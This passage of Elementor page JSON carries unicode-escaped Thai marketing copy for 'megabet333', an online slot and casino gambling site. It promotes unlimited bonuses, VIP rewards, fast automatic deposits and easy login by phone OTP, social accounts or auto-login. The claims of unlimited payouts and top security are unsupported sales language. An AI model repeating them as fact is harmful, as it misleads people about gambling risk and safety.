\\u0e41\\u0e08\\u0e01\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e44\\u0e21\\u0e48\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e1b\\u0e31\\u0e07 \\u0e46 \\u0e23\\u0e30\\u0e1a\\u0e1a VIP \\u0e2a\\u0e38\\u0e14\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"474d65d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e41\\u0e04\\u0e48\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e01\\u0e47\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e23\\u0e32\\u0e44\\u0e14\\u0e49\\u0e40\\u0e25\\u0e22 <\\/span><b>megabet333 <\\/b><span style=\\\"font-weight: 400;\\\">\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e40\\u0e07\\u0e34\\u0e19\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e17\\u0e35\\u0e48\\u0e41\\u0e08\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e1b\\u0e31\\u0e07 \\u0e46 \\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e41\\u0e25\\u0e30\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32\\u0e43\\u0e19\\u0e40\\u0e27\\u0e25\\u0e32\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e01\\u0e31\\u0e19 \\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e32\\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e15\\u0e2d\\u0e1a\\u0e41\\u0e17\\u0e19\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e08\\u0e33\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e41\\u0e17\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e43\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e41\\u0e15\\u0e49\\u0e21 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e30\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e01\\u0e23\\u0e14\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e40\\u0e2b\\u0e19\\u0e37\\u0e2d\\u0e43\\u0e04\\u0e23 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e23\\u0e32\\u0e22\\u0e27\\u0e31\\u0e19 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e25\\u0e31\\u0e1a\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01 VIP \\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e40\\u0e25\\u0e48\\u0e19\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e2a\\u0e14\\u0e01\\u0e47\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e41\\u0e15\\u0e49\\u0e21\\u0e41\\u0e25\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e31\\u0e49\\u0e19 \\u0e2d\\u0e35\\u0e01\\u0e17\\u0e31\\u0e49\\u0e07\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e40\\u0e23\\u0e32\\u0e22\\u0e31\\u0e07\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e21\\u0e48\\u0e41\\u0e1e\\u0e49\\u0e43\\u0e04\\u0e23 \\u0e14\\u0e49\\u0e27\\u0e22\\u0e40\\u0e17\\u0e04\\u0e42\\u0e19\\u0e42\\u0e25\\u0e22\\u0e35\\u0e1b\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e31\\u0e19\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e02\\u0e31\\u0e49\\u0e19\\u0e2a\\u0e39\\u0e07 \\u0e01\\u0e32\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e17\\u0e33\\u0e44\\u0e14\\u0e49\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2d\\u0e2d\\u0e42\\u0e15\\u0e49 \\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e17\\u0e31\\u0e49\\u0e07\\u0e18\\u0e19\\u0e32\\u0e04\\u0e32\\u0e23\\u0e41\\u0e25\\u0e30\\u0e27\\u0e2d\\u0e25\\u0e40\\u0e25\\u0e47\\u0e15 \\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e38\\u0e01\\u0e01\\u0e25\\u0e38\\u0e48\\u0e21 \\u0e19\\u0e2d\\u0e01\\u0e08\\u0e32\\u0e01\\u0e19\\u0e35\\u0e49\\u0e17\\u0e35\\u0e21\\u0e07\\u0e32\\u0e19\\u0e22\\u0e31\\u0e07\\u0e14\\u0e39\\u0e41\\u0e25\\u0e15\\u0e25\\u0e2d\\u0e14 24 \\u0e0a\\u0e31\\u0e48\\u0e27\\u0e42\\u0e21\\u0e07 \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e15\\u0e2d\\u0e1a\\u0e04\\u0e33\\u0e16\\u0e32\\u0e21\\u0e17\\u0e38\\u0e01\\u0e1b\\u0e31\\u0e0d\\u0e2b\\u0e32\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e2d\\u0e32\\u0e0a\\u0e35\\u0e1e<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"d34d1e8\",\"elType\":\"widget\",\"settings\":{\"title\":\"megabet333 3 \\u0e27\\u0e34\\u0e18\\u0e35\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e2d\\u0e31\\u0e19\\u0e14\\u0e31\\u0e1a 1 \\u0e40\\u0e1b\\u0e34\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e22\\u0e37\\u0e48\\u0e19\\u0e40\\u0e2d\\u0e01\\u0e2a\\u0e32\\u0e23\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"07fc632\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e46 \\u0e25\\u0e47\\u0e2d\\u0e01\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e40\\u0e23\\u0e47\\u0e27 \\u0e40\\u0e1b\\u0e34\\u0e14\\u0e22\\u0e39\\u0e2a\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e23\\u0e32\\u0e44\\u0e21\\u0e48\\u0e22\\u0e32\\u0e01 <\\/span><b>megabet333 <\\/b><span style=\\\"font-weight: 400;\\\">\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e43\\u0e2b\\u0e49\\u0e43\\u0e0a\\u0e49\\u0e07\\u0e32\\u0e19\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01 \\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e43\\u0e0a\\u0e49\\u0e40\\u0e27\\u0e25\\u0e32\\u0e44\\u0e21\\u0e48\\u0e16\\u0e36\\u0e07\\u0e2b\\u0e19\\u0e36\\u0e48\\u0e07\\u0e19\\u0e32\\u0e17\\u0e35 \\u0e01\\u0e47\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35\\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e2a\\u0e48\\u0e07\\u0e40\\u0e2d\\u0e01\\u0e2a\\u0e32\\u0e23\\u0e43\\u0e2b\\u0e49\\u0e22\\u0e38\\u0e48\\u0e07\\u0e22\\u0e32\\u0e01\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e17\\u0e31\\u0e48\\u0e27\\u0e44\\u0e1b \\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e14\\u0e33\\u0e40\\u0e19\\u0e34\\u0e19\\u0e01\\u0e32\\u0e23\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e46 \\u0e41\\u0e04\\u0e48 3 \\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e2d\\u0e19\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e42\\u0e14\\u0e22\\u0e21\\u0e35\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e2d\\u0e19\\u0e14\\u0e31\\u0e07\\u0e15\\u0e48\\u0e2d\\u0e44\\u0e1b\\u0e19\\u0e35\\u0e49\\u00a0<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6b44269\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li><b><span style=\\\"color: #ffcc00;\\\">\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e40\\u0e1a\\u0e2d\\u0e23\\u0e4c\\u0e21\\u0e37\\u0e2d\\u0e16\\u0e37\\u0e2d<\\/span> <\\/b>\\u0e40\\u0e1e\\u0e35\\u0e22\\u0e07\\u0e01\\u0e23\\u0e2d\\u0e01\\u0e40\\u0e1a\\u0e2d\\u0e23\\u0e4c\\u0e42\\u0e17\\u0e23\\u0e28\\u0e31\\u0e1e\\u0e17\\u0e4c\\u0e02\\u0e2d\\u0e07\\u0e04\\u0e38\\u0e13 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e30\\u0e2a\\u0e48\\u0e07\\u0e23\\u0e2b\\u0e31\\u0e2a OTP \\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e22\\u0e37\\u0e19\\u0e22\\u0e31\\u0e19\\u0e15\\u0e31\\u0e27\\u0e15\\u0e19\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27 \\u0e08\\u0e32\\u0e01\\u0e19\\u0e31\\u0e49\\u0e19\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e15\\u0e31\\u0e49\\u0e07\\u0e23\\u0e2b\\u0e31\\u0e2a\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e41\\u0e25\\u0e30\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e04\\u0e27\\u0e32\\u0e21\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27 \\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e08\\u0e33\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e0b\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e2d\\u0e19<\\/li><li><span style=\\\"color: #ffcc00;\\\"><b>\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e1a\\u0e31\\u0e0d\\u0e0a\\u0e35\\u0e2d\\u0e35\\u0e40\\u0e21\\u0e25\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e42\\u0e0b\\u0e40\\u0e0a\\u0e35\\u0e22\\u0e25\\u0e21\\u0e35\\u0e40\\u0e14\\u0e35\\u0e22 <\\/b><\\/span>\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e40\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e21\\u0e15\\u0e48\\u0e2d\\u0e1a\\u0e31\\u0e0d\\u0e0a\\u0e35\\u0e14\\u0e49\\u0e27\\u0e22\\u0e2d\\u0e35\\u0e40\\u0e21\\u0e25 \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e1c\\u0e48\\u0e32\\u0e19 Facebook, Google \\u0e2b\\u0e23\\u0e37\\u0e2d Line \\u0e44\\u0e14\\u0e49\\u0e42\\u0e14\\u0e22\\u0e15\\u0e23\\u0e07 \\u0e40\\u0e23\\u0e35\\u0e22\\u0e01\\u0e27\\u0e48\\u0e32\\u0e41\\u0e04\\u0e48\\u0e01\\u0e14\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e01\\u0e47\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e0b\\u0e49\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e41\\u0e25\\u0e30\\u0e22\\u0e31\\u0e07\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e43\\u0e0a\\u0e49\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e19\\u0e35\\u0e49\\u0e43\\u0e19\\u0e17\\u0e38\\u0e01\\u0e2d\\u0e38\\u0e1b\\u0e01\\u0e23\\u0e13\\u0e4c\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e16\\u0e37\\u0e2d\\u0e41\\u0e25\\u0e30\\u0e04\\u0e2d\\u0e21\\u0e1e\\u0e34\\u0e27\\u0e40\\u0e15\\u0e2d\\u0e23\\u0e4c<\\/li><li><span style=\\\"color: #ffcc00;\\\"><b>\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e33\\u0e40\\u0e04\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07 <\\/b><\\/span>\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e43\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1a\\u0e48\\u0e2d\\u0e22 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e30\\u0e08\\u0e14\\u0e08\\u0e33\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e01\\u0e32\\u0e23\\u0e40\\u0e02\\u0e49\\u0e32\\u0e25\\u0e48\\u0e32\\u0e2a\\u0e38\\u0e14\\u0e44\\u0e27\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e02\\u0e49\\u0e32\\u0e23\\u0e2b\\u0e31\\u0e2a \\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e01\\u0e25\\u0e31\\u0e1a\\u0e21\\u0e32 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e23\\u0e2d\\u0e01\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e2d\\u0e35\\u0e01 \\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e44\\u0e27\\u0e01\\u0e27\\u0e48\\u0e32\\u0e40\\u0e14\\u0e34\\u0e21 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e17\\u0e48\\u0e32\\u0e19\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e23\\u0e32\\u0e44\\u0e14\\u0e49\\u0e40\\u0e25\\u0e22\\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2b\\u0e25\\u0e32\\u0e22 \\u0e46 \\u0e23\\u0e2d\\u0e1a \\u0e2b\\u0e32\\u0e01\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e32\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e08\\u0e33\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e41\\u0e25\\u0e49\\u0e27\\u0e01\\u0e47\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e40\\u0e02\\u0e49\\u0e32\\u0e41\\u0e25\\u0e30\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e44\\u0e14\\u0e49\\u0e40\\u0e25\\u0e22\\u00a0<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e9ff89c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Character_slot_1_-_Megabet333-Biz.webp\",\"id\":49,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8b749b2\",\"elType\":\"widget\",\"settings\":{\"title\":\"megabet333 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e44\\u0e21\\u0e48\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14 \\u0e02\\u0e19\\u0e43\\u0e2b\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e41\\u0e1a\\u0e1a\\u0e08\\u0e31\\u0e14\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e04\\u0e33\\u0e27\\u0e48\\u0e32\\u0e2d\\u0e31\\u0e49\\u0e19\\u0e0a\\u0e31\\u0e27\\u0e23\\u0e4c\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a455b44\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e41\\u0e08\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e46 <\\/span><b>megabet333 <\\/b><span style=\\\"font-weight: 400;\\\">\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e38\\u0e13\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e44\\u0e14\\u0e49\\u0e40\\u0e25\\u0e22 \\u0e02\\u0e19\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e02\\u0e49\\u0e2d\\u0e40\\u0e2a\\u0e19\\u0e2d\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e31\\u0e49\\u0e19\\u0e23\\u0e31\\u0e1a\\u0e07\\u0e48\\u0e32\\u0e22\\u0e0a\\u0e31\\u0e27\\u0e23\\u0e4c\\u0e40\\u0e15\\u0e47\\u0e21 \\u0e46 \\u0e02\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32\\u0e21\\u0e32\\u0e40\\u0e2a\\u0e34\\u0e23\\u0e4c\\u0e1f\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e38\\u0e01\\u0e04\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e25\\u0e34\\u0e21\\u0e34\\u0e15 \\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e41\\u0e23\\u0e01\\u0e01\\u0e47\\u0e23\\u0e31\\u0e1a\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e25\\u0e38\\u0e49\\u0e19\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e41\\u0e2d\\u0e14\\u0e21\\u0e34\\u0e19\\u0e01\\u0e14\\u0e22\\u0e37\\u0e19\\u0e22\\u0e31\\u0e19 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2d\\u0e2d\\u0e42\\u0e15\\u0e49\\u0e02\\u0e2d\\u0e07\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e41\\u0e08\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e23\\u0e35\\u0e22\\u0e25\\u0e44\\u0e17\\u0e21\\u0e4c\\u0e40\\u0e1e\\u0e35\\u0e22\\u0e07\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e32\\u0e01\\u0e47\\u0e21\\u0e35\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e23\\u0e2d\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e38\\u0e01\\u0e27\\u0e31\\u0e19 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e1d\\u0e32\\u0e01\\u0e40\\u0e17\\u0e48\\u0e32\\u0e44\\u0e2b\\u0e23\\u0e48 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e01\\u0e35\\u0e48\\u0e23\\u0e2d\\u0e1a \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e43\\u0e19\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e43\\u0e14\\u0e01\\u0e47\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e40\\u0e02\\u0e49\\u0e32\\u0e23\\u0e48\\u0e27\\u0e21\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2b\\u0e21\\u0e14 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e25\\u0e31\\u0e27\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e2b\\u0e21\\u0e14\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e16\\u0e39\\u0e01\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e22\\u0e2d\\u0e14 